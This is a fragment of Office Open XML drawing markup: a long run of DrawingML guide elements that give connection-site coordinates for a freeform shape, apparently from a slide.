              <a:gd name="connsiteX179" fmla="*/ 224950 w 1605470"/>
              <a:gd name="connsiteY179" fmla="*/ 576846 h 6858000"/>
              <a:gd name="connsiteX180" fmla="*/ 204632 w 1605470"/>
              <a:gd name="connsiteY180" fmla="*/ 553868 h 6858000"/>
              <a:gd name="connsiteX181" fmla="*/ 239317 w 1605470"/>
              <a:gd name="connsiteY181" fmla="*/ 517614 h 6858000"/>
              <a:gd name="connsiteX182" fmla="*/ 201693 w 1605470"/>
              <a:gd name="connsiteY182" fmla="*/ 469651 h 6858000"/>
              <a:gd name="connsiteX183" fmla="*/ 195012 w 1605470"/>
              <a:gd name="connsiteY183" fmla="*/ 448559 h 6858000"/>
              <a:gd name="connsiteX184" fmla="*/ 201434 w 1605470"/>
              <a:gd name="connsiteY184" fmla="*/ 441529 h 6858000"/>
              <a:gd name="connsiteX185" fmla="*/ 200655 w 1605470"/>
              <a:gd name="connsiteY185" fmla="*/ 428927 h 6858000"/>
              <a:gd name="connsiteX186" fmla="*/ 190059 w 1605470"/>
              <a:gd name="connsiteY186" fmla="*/ 430161 h 6858000"/>
              <a:gd name="connsiteX187" fmla="*/ 184450 w 1605470"/>
              <a:gd name="connsiteY187" fmla="*/ 396240 h 6858000"/>
              <a:gd name="connsiteX188" fmla="*/ 146196 w 1605470"/>
              <a:gd name="connsiteY188" fmla="*/ 358810 h 6858000"/>
              <a:gd name="connsiteX189" fmla="*/ 124571 w 1605470"/>
              <a:gd name="connsiteY189" fmla="*/ 302178 h 6858000"/>
              <a:gd name="connsiteX190" fmla="*/ 103243 w 1605470"/>
              <a:gd name="connsiteY190" fmla="*/ 211375 h 6858000"/>
              <a:gd name="connsiteX191" fmla="*/ 94571 w 1605470"/>
              <a:gd name="connsiteY191" fmla="*/ 184179 h 6858000"/>
              <a:gd name="connsiteX192" fmla="*/ 13437 w 1605470"/>
              <a:gd name="connsiteY192" fmla="*/ 19287 h 6858000"/>
              <a:gd name="connsiteX193" fmla="*/ 0 w 1605470"/>
              <a:gd name="connsiteY19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6326 w 1605470"/>
              <a:gd name="connsiteY155" fmla="*/ 1428585 h 6858000"/>
              <a:gd name="connsiteX156" fmla="*/ 325799 w 1605470"/>
              <a:gd name="connsiteY156" fmla="*/ 1357181 h 6858000"/>
              <a:gd name="connsiteX157" fmla="*/ 320507 w 1605470"/>
              <a:gd name="connsiteY157" fmla="*/ 1347099 h 6858000"/>
              <a:gd name="connsiteX158" fmla="*/ 335347 w 1605470"/>
              <a:gd name="connsiteY158" fmla="*/ 1334233 h 6858000"/>
              <a:gd name="connsiteX159" fmla="*/ 342792 w 1605470"/>
              <a:gd name="connsiteY159" fmla="*/ 1307086 h 6858000"/>
              <a:gd name="connsiteX160" fmla="*/ 343980 w 1605470"/>
              <a:gd name="connsiteY160" fmla="*/ 1189033 h 6858000"/>
              <a:gd name="connsiteX161" fmla="*/ 348665 w 1605470"/>
              <a:gd name="connsiteY161" fmla="*/ 1168288 h 6858000"/>
              <a:gd name="connsiteX162" fmla="*/ 340947 w 1605470"/>
              <a:gd name="connsiteY162" fmla="*/ 1142577 h 6858000"/>
              <a:gd name="connsiteX163" fmla="*/ 330253 w 1605470"/>
              <a:gd name="connsiteY163" fmla="*/ 1088484 h 6858000"/>
              <a:gd name="connsiteX164" fmla="*/ 314647 w 1605470"/>
              <a:gd name="connsiteY164" fmla="*/ 1053424 h 6858000"/>
              <a:gd name="connsiteX165" fmla="*/ 322906 w 1605470"/>
              <a:gd name="connsiteY165" fmla="*/ 1044367 h 6858000"/>
              <a:gd name="connsiteX166" fmla="*/ 326818 w 1605470"/>
              <a:gd name="connsiteY166" fmla="*/ 1022828 h 6858000"/>
              <a:gd name="connsiteX167" fmla="*/ 320445 w 1605470"/>
              <a:gd name="connsiteY167" fmla="*/ 932283 h 6858000"/>
              <a:gd name="connsiteX168" fmla="*/ 322681 w 1605470"/>
              <a:gd name="connsiteY168" fmla="*/ 915925 h 6858000"/>
              <a:gd name="connsiteX169" fmla="*/ 315310 w 1605470"/>
              <a:gd name="connsiteY169" fmla="*/ 896999 h 6858000"/>
              <a:gd name="connsiteX170" fmla="*/ 284718 w 1605470"/>
              <a:gd name="connsiteY170" fmla="*/ 821517 h 6858000"/>
              <a:gd name="connsiteX171" fmla="*/ 263668 w 1605470"/>
              <a:gd name="connsiteY171" fmla="*/ 751353 h 6858000"/>
              <a:gd name="connsiteX172" fmla="*/ 254540 w 1605470"/>
              <a:gd name="connsiteY172" fmla="*/ 741965 h 6858000"/>
              <a:gd name="connsiteX173" fmla="*/ 252501 w 1605470"/>
              <a:gd name="connsiteY173" fmla="*/ 724635 h 6858000"/>
              <a:gd name="connsiteX174" fmla="*/ 248897 w 1605470"/>
              <a:gd name="connsiteY174" fmla="*/ 681659 h 6858000"/>
              <a:gd name="connsiteX175" fmla="*/ 234316 w 1605470"/>
              <a:gd name="connsiteY175" fmla="*/ 635218 h 6858000"/>
              <a:gd name="connsiteX176" fmla="*/ 239327 w 1605470"/>
              <a:gd name="connsiteY176" fmla="*/ 613763 h 6858000"/>
              <a:gd name="connsiteX177" fmla="*/ 225269 w 1605470"/>
              <a:gd name="connsiteY177" fmla="*/ 598582 h 6858000"/>
              <a:gd name="connsiteX178" fmla="*/ 224950 w 1605470"/>
              <a:gd name="connsiteY178" fmla="*/ 576846 h 6858000"/>
              <a:gd name="connsiteX179" fmla="*/ 204632 w 1605470"/>
              <a:gd name="connsiteY179" fmla="*/ 553868 h 6858000"/>
              <a:gd name="connsiteX180" fmla="*/ 239317 w 1605470"/>
              <a:gd name="connsiteY180" fmla="*/ 517614 h 6858000"/>
              <a:gd name="connsiteX181" fmla="*/ 201693 w 1605470"/>
              <a:gd name="connsiteY181" fmla="*/ 469651 h 6858000"/>
              <a:gd name="connsiteX182" fmla="*/ 195012 w 1605470"/>
              <a:gd name="connsiteY182" fmla="*/ 448559 h 6858000"/>
              <a:gd name="connsiteX183" fmla="*/ 201434 w 1605470"/>
              <a:gd name="connsiteY183" fmla="*/ 441529 h 6858000"/>
              <a:gd name="connsiteX184" fmla="*/ 200655 w 1605470"/>
              <a:gd name="connsiteY184" fmla="*/ 428927 h 6858000"/>
              <a:gd name="connsiteX185" fmla="*/ 190059 w 1605470"/>
              <a:gd name="connsiteY185" fmla="*/ 430161 h 6858000"/>
              <a:gd name="connsiteX186" fmla="*/ 184450 w 1605470"/>
              <a:gd name="connsiteY186" fmla="*/ 396240 h 6858000"/>
              <a:gd name="connsiteX187" fmla="*/ 146196 w 1605470"/>
              <a:gd name="connsiteY187" fmla="*/ 358810 h 6858000"/>
              <a:gd name="connsiteX188" fmla="*/ 124571 w 1605470"/>
              <a:gd name="connsiteY188" fmla="*/ 302178 h 6858000"/>
              <a:gd name="connsiteX189" fmla="*/ 103243 w 1605470"/>
              <a:gd name="connsiteY189" fmla="*/ 211375 h 6858000"/>
              <a:gd name="connsiteX190" fmla="*/ 94571 w 1605470"/>
              <a:gd name="connsiteY190" fmla="*/ 184179 h 6858000"/>
              <a:gd name="connsiteX191" fmla="*/ 13437 w 1605470"/>
              <a:gd name="connsiteY191" fmla="*/ 19287 h 6858000"/>
              <a:gd name="connsiteX192" fmla="*/ 0 w 1605470"/>
              <a:gd name="connsiteY19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6818 w 1605470"/>
              <a:gd name="connsiteY165" fmla="*/ 1022828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6818 w 1605470"/>
              <a:gd name="connsiteY165" fmla="*/ 1022828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6818 w 1605470"/>
              <a:gd name="connsiteY165" fmla="*/ 1022828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2475 w 1605470"/>
              <a:gd name="connsiteY165" fmla="*/ 1002093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475 w 1605470"/>
              <a:gd name="connsiteY164" fmla="*/ 1002093 h 6858000"/>
              <a:gd name="connsiteX165" fmla="*/ 320445 w 1605470"/>
              <a:gd name="connsiteY165" fmla="*/ 932283 h 6858000"/>
              <a:gd name="connsiteX166" fmla="*/ 322681 w 1605470"/>
              <a:gd name="connsiteY166" fmla="*/ 915925 h 6858000"/>
              <a:gd name="connsiteX167" fmla="*/ 315310 w 1605470"/>
              <a:gd name="connsiteY167" fmla="*/ 896999 h 6858000"/>
              <a:gd name="connsiteX168" fmla="*/ 284718 w 1605470"/>
              <a:gd name="connsiteY168" fmla="*/ 821517 h 6858000"/>
              <a:gd name="connsiteX169" fmla="*/ 263668 w 1605470"/>
              <a:gd name="connsiteY169" fmla="*/ 751353 h 6858000"/>
              <a:gd name="connsiteX170" fmla="*/ 254540 w 1605470"/>
              <a:gd name="connsiteY170" fmla="*/ 741965 h 6858000"/>
              <a:gd name="connsiteX171" fmla="*/ 252501 w 1605470"/>
              <a:gd name="connsiteY171" fmla="*/ 724635 h 6858000"/>
              <a:gd name="connsiteX172" fmla="*/ 248897 w 1605470"/>
              <a:gd name="connsiteY172" fmla="*/ 681659 h 6858000"/>
              <a:gd name="connsiteX173" fmla="*/ 234316 w 1605470"/>
              <a:gd name="connsiteY173" fmla="*/ 635218 h 6858000"/>
              <a:gd name="connsiteX174" fmla="*/ 239327 w 1605470"/>
              <a:gd name="connsiteY174" fmla="*/ 613763 h 6858000"/>
              <a:gd name="connsiteX175" fmla="*/ 225269 w 1605470"/>
              <a:gd name="connsiteY175" fmla="*/ 598582 h 6858000"/>
              <a:gd name="connsiteX176" fmla="*/ 224950 w 1605470"/>
              <a:gd name="connsiteY176" fmla="*/ 576846 h 6858000"/>
              <a:gd name="connsiteX177" fmla="*/ 204632 w 1605470"/>
              <a:gd name="connsiteY177" fmla="*/ 553868 h 6858000"/>
              <a:gd name="connsiteX178" fmla="*/ 239317 w 1605470"/>
              <a:gd name="connsiteY178" fmla="*/ 517614 h 6858000"/>
              <a:gd name="connsiteX179" fmla="*/ 201693 w 1605470"/>
              <a:gd name="connsiteY179" fmla="*/ 469651 h 6858000"/>
              <a:gd name="connsiteX180" fmla="*/ 195012 w 1605470"/>
              <a:gd name="connsiteY180" fmla="*/ 448559 h 6858000"/>
              <a:gd name="connsiteX181" fmla="*/ 201434 w 1605470"/>
              <a:gd name="connsiteY181" fmla="*/ 441529 h 6858000"/>
              <a:gd name="connsiteX182" fmla="*/ 200655 w 1605470"/>
              <a:gd name="connsiteY182" fmla="*/ 428927 h 6858000"/>
              <a:gd name="connsiteX183" fmla="*/ 190059 w 1605470"/>
              <a:gd name="connsiteY183" fmla="*/ 430161 h 6858000"/>
              <a:gd name="connsiteX184" fmla="*/ 184450 w 1605470"/>
              <a:gd name="connsiteY184" fmla="*/ 396240 h 6858000"/>
              <a:gd name="connsiteX185" fmla="*/ 146196 w 1605470"/>
              <a:gd name="connsiteY185" fmla="*/ 358810 h 6858000"/>
              <a:gd name="connsiteX186" fmla="*/ 124571 w 1605470"/>
              <a:gd name="connsiteY186" fmla="*/ 302178 h 6858000"/>
              <a:gd name="connsiteX187" fmla="*/ 103243 w 1605470"/>
              <a:gd name="connsiteY187" fmla="*/ 211375 h 6858000"/>
              <a:gd name="connsiteX188" fmla="*/ 94571 w 1605470"/>
              <a:gd name="connsiteY188" fmla="*/ 184179 h 6858000"/>
              <a:gd name="connsiteX189" fmla="*/ 13437 w 1605470"/>
              <a:gd name="connsiteY189" fmla="*/ 19287 h 6858000"/>
              <a:gd name="connsiteX190" fmla="*/ 0 w 1605470"/>
              <a:gd name="connsiteY19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36360 w 1605470"/>
              <a:gd name="connsiteY163" fmla="*/ 1045131 h 6858000"/>
              <a:gd name="connsiteX164" fmla="*/ 322475 w 1605470"/>
              <a:gd name="connsiteY164" fmla="*/ 1002093 h 6858000"/>
              <a:gd name="connsiteX165" fmla="*/ 320445 w 1605470"/>
              <a:gd name="connsiteY165" fmla="*/ 932283 h 6858000"/>
              <a:gd name="connsiteX166" fmla="*/ 322681 w 1605470"/>
              <a:gd name="connsiteY166" fmla="*/ 915925 h 6858000"/>
              <a:gd name="connsiteX167" fmla="*/ 315310 w 1605470"/>
              <a:gd name="connsiteY167" fmla="*/ 896999 h 6858000"/>
              <a:gd name="connsiteX168" fmla="*/ 284718 w 1605470"/>
              <a:gd name="connsiteY168" fmla="*/ 821517 h 6858000"/>
              <a:gd name="connsiteX169" fmla="*/ 263668 w 1605470"/>
              <a:gd name="connsiteY169" fmla="*/ 751353 h 6858000"/>
              <a:gd name="connsiteX170" fmla="*/ 254540 w 1605470"/>
              <a:gd name="connsiteY170" fmla="*/ 741965 h 6858000"/>
              <a:gd name="connsiteX171" fmla="*/ 252501 w 1605470"/>
              <a:gd name="connsiteY171" fmla="*/ 724635 h 6858000"/>
              <a:gd name="connsiteX172" fmla="*/ 248897 w 1605470"/>
              <a:gd name="connsiteY172" fmla="*/ 681659 h 6858000"/>
              <a:gd name="connsiteX173" fmla="*/ 234316 w 1605470"/>
              <a:gd name="connsiteY173" fmla="*/ 635218 h 6858000"/>
              <a:gd name="connsiteX174" fmla="*/ 239327 w 1605470"/>
              <a:gd name="connsiteY174" fmla="*/ 613763 h 6858000"/>
              <a:gd name="connsiteX175" fmla="*/ 225269 w 1605470"/>
              <a:gd name="connsiteY175" fmla="*/ 598582 h 6858000"/>
              <a:gd name="connsiteX176" fmla="*/ 224950 w 1605470"/>
              <a:gd name="connsiteY176" fmla="*/ 576846 h 6858000"/>
              <a:gd name="connsiteX177" fmla="*/ 204632 w 1605470"/>
              <a:gd name="connsiteY177" fmla="*/ 553868 h 6858000"/>
              <a:gd name="connsiteX178" fmla="*/ 239317 w 1605470"/>
              <a:gd name="connsiteY178" fmla="*/ 517614 h 6858000"/>
              <a:gd name="connsiteX179" fmla="*/ 201693 w 1605470"/>
              <a:gd name="connsiteY179" fmla="*/ 469651 h 6858000"/>
              <a:gd name="connsiteX180" fmla="*/ 195012 w 1605470"/>
              <a:gd name="connsiteY180" fmla="*/ 448559 h 6858000"/>
              <a:gd name="connsiteX181" fmla="*/ 201434 w 1605470"/>
              <a:gd name="connsiteY181" fmla="*/ 441529 h 6858000"/>
              <a:gd name="connsiteX182" fmla="*/ 200655 w 1605470"/>
              <a:gd name="connsiteY182" fmla="*/ 428927 h 6858000"/>
              <a:gd name="connsiteX183" fmla="*/ 190059 w 1605470"/>
              <a:gd name="connsiteY183" fmla="*/ 430161 h 6858000"/>
              <a:gd name="connsiteX184" fmla="*/ 184450 w 1605470"/>
              <a:gd name="connsiteY184" fmla="*/ 396240 h 6858000"/>
              <a:gd name="connsiteX185" fmla="*/ 146196 w 1605470"/>
              <a:gd name="connsiteY185" fmla="*/ 358810 h 6858000"/>
              <a:gd name="connsiteX186" fmla="*/ 124571 w 1605470"/>
              <a:gd name="connsiteY186" fmla="*/ 302178 h 6858000"/>
              <a:gd name="connsiteX187" fmla="*/ 103243 w 1605470"/>
              <a:gd name="connsiteY187" fmla="*/ 211375 h 6858000"/>
              <a:gd name="connsiteX188" fmla="*/ 94571 w 1605470"/>
              <a:gd name="connsiteY188" fmla="*/ 184179 h 6858000"/>
              <a:gd name="connsiteX189" fmla="*/ 13437 w 1605470"/>
              <a:gd name="connsiteY189" fmla="*/ 19287 h 6858000"/>
              <a:gd name="connsiteX190" fmla="*/ 0 w 1605470"/>
              <a:gd name="connsiteY19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42792 w 1605470"/>
              <a:gd name="connsiteY157" fmla="*/ 1307086 h 6858000"/>
              <a:gd name="connsiteX158" fmla="*/ 343980 w 1605470"/>
              <a:gd name="connsiteY158" fmla="*/ 1189033 h 6858000"/>
              <a:gd name="connsiteX159" fmla="*/ 348665 w 1605470"/>
              <a:gd name="connsiteY159" fmla="*/ 1168288 h 6858000"/>
              <a:gd name="connsiteX160" fmla="*/ 340947 w 1605470"/>
              <a:gd name="connsiteY160" fmla="*/ 1142577 h 6858000"/>
              <a:gd name="connsiteX161" fmla="*/ 330253 w 1605470"/>
              <a:gd name="connsiteY161" fmla="*/ 1088484 h 6858000"/>
              <a:gd name="connsiteX162" fmla="*/ 336360 w 1605470"/>
              <a:gd name="connsiteY162" fmla="*/ 1045131 h 6858000"/>
              <a:gd name="connsiteX163" fmla="*/ 322475 w 1605470"/>
              <a:gd name="connsiteY163" fmla="*/ 1002093 h 6858000"/>
              <a:gd name="connsiteX164" fmla="*/ 320445 w 1605470"/>
              <a:gd name="connsiteY164" fmla="*/ 932283 h 6858000"/>
              <a:gd name="connsiteX165" fmla="*/ 322681 w 1605470"/>
              <a:gd name="connsiteY165" fmla="*/ 915925 h 6858000"/>
              <a:gd name="connsiteX166" fmla="*/ 315310 w 1605470"/>
              <a:gd name="connsiteY166" fmla="*/ 896999 h 6858000"/>
              <a:gd name="connsiteX167" fmla="*/ 284718 w 1605470"/>
              <a:gd name="connsiteY167" fmla="*/ 821517 h 6858000"/>
              <a:gd name="connsiteX168" fmla="*/ 263668 w 1605470"/>
              <a:gd name="connsiteY168" fmla="*/ 751353 h 6858000"/>
              <a:gd name="connsiteX169" fmla="*/ 254540 w 1605470"/>
              <a:gd name="connsiteY169" fmla="*/ 741965 h 6858000"/>
              <a:gd name="connsiteX170" fmla="*/ 252501 w 1605470"/>
              <a:gd name="connsiteY170" fmla="*/ 724635 h 6858000"/>
              <a:gd name="connsiteX171" fmla="*/ 248897 w 1605470"/>
              <a:gd name="connsiteY171" fmla="*/ 681659 h 6858000"/>
              <a:gd name="connsiteX172" fmla="*/ 234316 w 1605470"/>
              <a:gd name="connsiteY172" fmla="*/ 635218 h 6858000"/>
              <a:gd name="connsiteX173" fmla="*/ 239327 w 1605470"/>
              <a:gd name="connsiteY173" fmla="*/ 613763 h 6858000"/>
              <a:gd name="connsiteX174" fmla="*/ 225269 w 1605470"/>
              <a:gd name="connsiteY174" fmla="*/ 598582 h 6858000"/>
              <a:gd name="connsiteX175" fmla="*/ 224950 w 1605470"/>
              <a:gd name="connsiteY175" fmla="*/ 576846 h 6858000"/>
              <a:gd name="connsiteX176" fmla="*/ 204632 w 1605470"/>
              <a:gd name="connsiteY176" fmla="*/ 553868 h 6858000"/>
              <a:gd name="connsiteX177" fmla="*/ 239317 w 1605470"/>
              <a:gd name="connsiteY177" fmla="*/ 517614 h 6858000"/>
              <a:gd name="connsiteX178" fmla="*/ 201693 w 1605470"/>
              <a:gd name="connsiteY178" fmla="*/ 469651 h 6858000"/>
              <a:gd name="connsiteX179" fmla="*/ 195012 w 1605470"/>
              <a:gd name="connsiteY179" fmla="*/ 448559 h 6858000"/>
              <a:gd name="connsiteX180" fmla="*/ 201434 w 1605470"/>
              <a:gd name="connsiteY180" fmla="*/ 441529 h 6858000"/>
              <a:gd name="connsiteX181" fmla="*/ 200655 w 1605470"/>
              <a:gd name="connsiteY181" fmla="*/ 428927 h 6858000"/>
              <a:gd name="connsiteX182" fmla="*/ 190059 w 1605470"/>
              <a:gd name="connsiteY182" fmla="*/ 430161 h 6858000"/>
              <a:gd name="connsiteX183" fmla="*/ 184450 w 1605470"/>
              <a:gd name="connsiteY183" fmla="*/ 396240 h 6858000"/>
              <a:gd name="connsiteX184" fmla="*/ 146196 w 1605470"/>
              <a:gd name="connsiteY184" fmla="*/ 358810 h 6858000"/>
              <a:gd name="connsiteX185" fmla="*/ 124571 w 1605470"/>
              <a:gd name="connsiteY185" fmla="*/ 302178 h 6858000"/>
              <a:gd name="connsiteX186" fmla="*/ 103243 w 1605470"/>
              <a:gd name="connsiteY186" fmla="*/ 211375 h 6858000"/>
              <a:gd name="connsiteX187" fmla="*/ 94571 w 1605470"/>
              <a:gd name="connsiteY187" fmla="*/ 184179 h 6858000"/>
              <a:gd name="connsiteX188" fmla="*/ 13437 w 1605470"/>
              <a:gd name="connsiteY188" fmla="*/ 19287 h 6858000"/>
              <a:gd name="connsiteX189" fmla="*/ 0 w 1605470"/>
              <a:gd name="connsiteY18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52501 w 1605470"/>
              <a:gd name="connsiteY169" fmla="*/ 724635 h 6858000"/>
              <a:gd name="connsiteX170" fmla="*/ 248897 w 1605470"/>
              <a:gd name="connsiteY170" fmla="*/ 681659 h 6858000"/>
              <a:gd name="connsiteX171" fmla="*/ 234316 w 1605470"/>
              <a:gd name="connsiteY171" fmla="*/ 635218 h 6858000"/>
              <a:gd name="connsiteX172" fmla="*/ 239327 w 1605470"/>
              <a:gd name="connsiteY172" fmla="*/ 613763 h 6858000"/>
              <a:gd name="connsiteX173" fmla="*/ 225269 w 1605470"/>
              <a:gd name="connsiteY173" fmla="*/ 598582 h 6858000"/>
              <a:gd name="connsiteX174" fmla="*/ 224950 w 1605470"/>
              <a:gd name="connsiteY174" fmla="*/ 576846 h 6858000"/>
              <a:gd name="connsiteX175" fmla="*/ 204632 w 1605470"/>
              <a:gd name="connsiteY175" fmla="*/ 553868 h 6858000"/>
              <a:gd name="connsiteX176" fmla="*/ 239317 w 1605470"/>
              <a:gd name="connsiteY176" fmla="*/ 517614 h 6858000"/>
              <a:gd name="connsiteX177" fmla="*/ 201693 w 1605470"/>
              <a:gd name="connsiteY177" fmla="*/ 469651 h 6858000"/>
              <a:gd name="connsiteX178" fmla="*/ 195012 w 1605470"/>
              <a:gd name="connsiteY178" fmla="*/ 448559 h 6858000"/>
              <a:gd name="connsiteX179" fmla="*/ 201434 w 1605470"/>
              <a:gd name="connsiteY179" fmla="*/ 441529 h 6858000"/>
              <a:gd name="connsiteX180" fmla="*/ 200655 w 1605470"/>
              <a:gd name="connsiteY180" fmla="*/ 428927 h 6858000"/>
              <a:gd name="connsiteX181" fmla="*/ 190059 w 1605470"/>
              <a:gd name="connsiteY181" fmla="*/ 430161 h 6858000"/>
              <a:gd name="connsiteX182" fmla="*/ 184450 w 1605470"/>
              <a:gd name="connsiteY182" fmla="*/ 396240 h 6858000"/>
              <a:gd name="connsiteX183" fmla="*/ 146196 w 1605470"/>
              <a:gd name="connsiteY183" fmla="*/ 358810 h 6858000"/>
              <a:gd name="connsiteX184" fmla="*/ 124571 w 1605470"/>
              <a:gd name="connsiteY184" fmla="*/ 302178 h 6858000"/>
              <a:gd name="connsiteX185" fmla="*/ 103243 w 1605470"/>
              <a:gd name="connsiteY185" fmla="*/ 211375 h 6858000"/>
              <a:gd name="connsiteX186" fmla="*/ 94571 w 1605470"/>
              <a:gd name="connsiteY186" fmla="*/ 184179 h 6858000"/>
              <a:gd name="connsiteX187" fmla="*/ 13437 w 1605470"/>
              <a:gd name="connsiteY187" fmla="*/ 19287 h 6858000"/>
              <a:gd name="connsiteX188" fmla="*/ 0 w 1605470"/>
              <a:gd name="connsiteY18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52501 w 1605470"/>
              <a:gd name="connsiteY169" fmla="*/ 724635 h 6858000"/>
              <a:gd name="connsiteX170" fmla="*/ 248897 w 1605470"/>
              <a:gd name="connsiteY170" fmla="*/ 681659 h 6858000"/>
              <a:gd name="connsiteX171" fmla="*/ 234316 w 1605470"/>
              <a:gd name="connsiteY171" fmla="*/ 635218 h 6858000"/>
              <a:gd name="connsiteX172" fmla="*/ 239327 w 1605470"/>
              <a:gd name="connsiteY172" fmla="*/ 613763 h 6858000"/>
              <a:gd name="connsiteX173" fmla="*/ 225269 w 1605470"/>
              <a:gd name="connsiteY173" fmla="*/ 598582 h 6858000"/>
              <a:gd name="connsiteX174" fmla="*/ 224950 w 1605470"/>
              <a:gd name="connsiteY174" fmla="*/ 576846 h 6858000"/>
              <a:gd name="connsiteX175" fmla="*/ 204632 w 1605470"/>
              <a:gd name="connsiteY175" fmla="*/ 553868 h 6858000"/>
              <a:gd name="connsiteX176" fmla="*/ 239317 w 1605470"/>
              <a:gd name="connsiteY176" fmla="*/ 517614 h 6858000"/>
              <a:gd name="connsiteX177" fmla="*/ 201693 w 1605470"/>
              <a:gd name="connsiteY177" fmla="*/ 469651 h 6858000"/>
              <a:gd name="connsiteX178" fmla="*/ 195012 w 1605470"/>
              <a:gd name="connsiteY178" fmla="*/ 448559 h 6858000"/>
              <a:gd name="connsiteX179" fmla="*/ 201434 w 1605470"/>
              <a:gd name="connsiteY179" fmla="*/ 441529 h 6858000"/>
              <a:gd name="connsiteX180" fmla="*/ 200655 w 1605470"/>
              <a:gd name="connsiteY180" fmla="*/ 428927 h 6858000"/>
              <a:gd name="connsiteX181" fmla="*/ 190059 w 1605470"/>
              <a:gd name="connsiteY181" fmla="*/ 430161 h 6858000"/>
              <a:gd name="connsiteX182" fmla="*/ 184450 w 1605470"/>
              <a:gd name="connsiteY182" fmla="*/ 396240 h 6858000"/>
              <a:gd name="connsiteX183" fmla="*/ 146196 w 1605470"/>
              <a:gd name="connsiteY183" fmla="*/ 358810 h 6858000"/>
              <a:gd name="connsiteX184" fmla="*/ 124571 w 1605470"/>
              <a:gd name="connsiteY184" fmla="*/ 302178 h 6858000"/>
              <a:gd name="connsiteX185" fmla="*/ 103243 w 1605470"/>
              <a:gd name="connsiteY185" fmla="*/ 211375 h 6858000"/>
              <a:gd name="connsiteX186" fmla="*/ 94571 w 1605470"/>
              <a:gd name="connsiteY186" fmla="*/ 184179 h 6858000"/>
              <a:gd name="connsiteX187" fmla="*/ 13437 w 1605470"/>
              <a:gd name="connsiteY187" fmla="*/ 19287 h 6858000"/>
              <a:gd name="connsiteX188" fmla="*/ 0 w 1605470"/>
              <a:gd name="connsiteY18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04632 w 1605470"/>
              <a:gd name="connsiteY174" fmla="*/ 553868 h 6858000"/>
              <a:gd name="connsiteX175" fmla="*/ 239317 w 1605470"/>
              <a:gd name="connsiteY175" fmla="*/ 517614 h 6858000"/>
              <a:gd name="connsiteX176" fmla="*/ 201693 w 1605470"/>
              <a:gd name="connsiteY176" fmla="*/ 469651 h 6858000"/>
              <a:gd name="connsiteX177" fmla="*/ 195012 w 1605470"/>
              <a:gd name="connsiteY177" fmla="*/ 448559 h 6858000"/>
              <a:gd name="connsiteX178" fmla="*/ 201434 w 1605470"/>
              <a:gd name="connsiteY178" fmla="*/ 441529 h 6858000"/>
              <a:gd name="connsiteX179" fmla="*/ 200655 w 1605470"/>
              <a:gd name="connsiteY179" fmla="*/ 428927 h 6858000"/>
              <a:gd name="connsiteX180" fmla="*/ 190059 w 1605470"/>
              <a:gd name="connsiteY180" fmla="*/ 430161 h 6858000"/>
              <a:gd name="connsiteX181" fmla="*/ 184450 w 1605470"/>
              <a:gd name="connsiteY181" fmla="*/ 396240 h 6858000"/>
              <a:gd name="connsiteX182" fmla="*/ 146196 w 1605470"/>
              <a:gd name="connsiteY182" fmla="*/ 358810 h 6858000"/>
              <a:gd name="connsiteX183" fmla="*/ 124571 w 1605470"/>
              <a:gd name="connsiteY183" fmla="*/ 302178 h 6858000"/>
              <a:gd name="connsiteX184" fmla="*/ 103243 w 1605470"/>
              <a:gd name="connsiteY184" fmla="*/ 211375 h 6858000"/>
              <a:gd name="connsiteX185" fmla="*/ 94571 w 1605470"/>
              <a:gd name="connsiteY185" fmla="*/ 184179 h 6858000"/>
              <a:gd name="connsiteX186" fmla="*/ 13437 w 1605470"/>
              <a:gd name="connsiteY186" fmla="*/ 19287 h 6858000"/>
              <a:gd name="connsiteX187" fmla="*/ 0 w 1605470"/>
              <a:gd name="connsiteY18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01693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84450 w 1605470"/>
              <a:gd name="connsiteY180" fmla="*/ 396240 h 6858000"/>
              <a:gd name="connsiteX181" fmla="*/ 146196 w 1605470"/>
              <a:gd name="connsiteY181" fmla="*/ 358810 h 6858000"/>
              <a:gd name="connsiteX182" fmla="*/ 124571 w 1605470"/>
              <a:gd name="connsiteY182" fmla="*/ 302178 h 6858000"/>
              <a:gd name="connsiteX183" fmla="*/ 103243 w 1605470"/>
              <a:gd name="connsiteY183" fmla="*/ 211375 h 6858000"/>
              <a:gd name="connsiteX184" fmla="*/ 94571 w 1605470"/>
              <a:gd name="connsiteY184" fmla="*/ 184179 h 6858000"/>
              <a:gd name="connsiteX185" fmla="*/ 13437 w 1605470"/>
              <a:gd name="connsiteY185" fmla="*/ 19287 h 6858000"/>
              <a:gd name="connsiteX186" fmla="*/ 0 w 1605470"/>
              <a:gd name="connsiteY18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01693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84450 w 1605470"/>
              <a:gd name="connsiteY180" fmla="*/ 396240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01693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67079 w 1605470"/>
              <a:gd name="connsiteY180" fmla="*/ 367211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19064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67079 w 1605470"/>
              <a:gd name="connsiteY180" fmla="*/ 367211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04576 w 1605470"/>
              <a:gd name="connsiteY174" fmla="*/ 530055 h 6858000"/>
              <a:gd name="connsiteX175" fmla="*/ 219064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67079 w 1605470"/>
              <a:gd name="connsiteY180" fmla="*/ 367211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54540 w 1605470"/>
              <a:gd name="connsiteY167" fmla="*/ 741965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54540 w 1605470"/>
              <a:gd name="connsiteY167" fmla="*/ 741965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61783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61783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61783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10868 w 1605470"/>
              <a:gd name="connsiteY81" fmla="*/ 4048827 h 6858000"/>
              <a:gd name="connsiteX82" fmla="*/ 704810 w 1605470"/>
              <a:gd name="connsiteY82" fmla="*/ 4033999 h 6858000"/>
              <a:gd name="connsiteX83" fmla="*/ 705959 w 1605470"/>
              <a:gd name="connsiteY83" fmla="*/ 4031933 h 6858000"/>
              <a:gd name="connsiteX84" fmla="*/ 704535 w 1605470"/>
              <a:gd name="connsiteY84" fmla="*/ 4013953 h 6858000"/>
              <a:gd name="connsiteX85" fmla="*/ 700443 w 1605470"/>
              <a:gd name="connsiteY85" fmla="*/ 4010511 h 6858000"/>
              <a:gd name="connsiteX86" fmla="*/ 698282 w 1605470"/>
              <a:gd name="connsiteY86" fmla="*/ 3998331 h 6858000"/>
              <a:gd name="connsiteX87" fmla="*/ 690830 w 1605470"/>
              <a:gd name="connsiteY87" fmla="*/ 3974753 h 6858000"/>
              <a:gd name="connsiteX88" fmla="*/ 692428 w 1605470"/>
              <a:gd name="connsiteY88" fmla="*/ 3969950 h 6858000"/>
              <a:gd name="connsiteX89" fmla="*/ 685850 w 1605470"/>
              <a:gd name="connsiteY89" fmla="*/ 3933779 h 6858000"/>
              <a:gd name="connsiteX90" fmla="*/ 687181 w 1605470"/>
              <a:gd name="connsiteY90" fmla="*/ 3933093 h 6858000"/>
              <a:gd name="connsiteX91" fmla="*/ 691535 w 1605470"/>
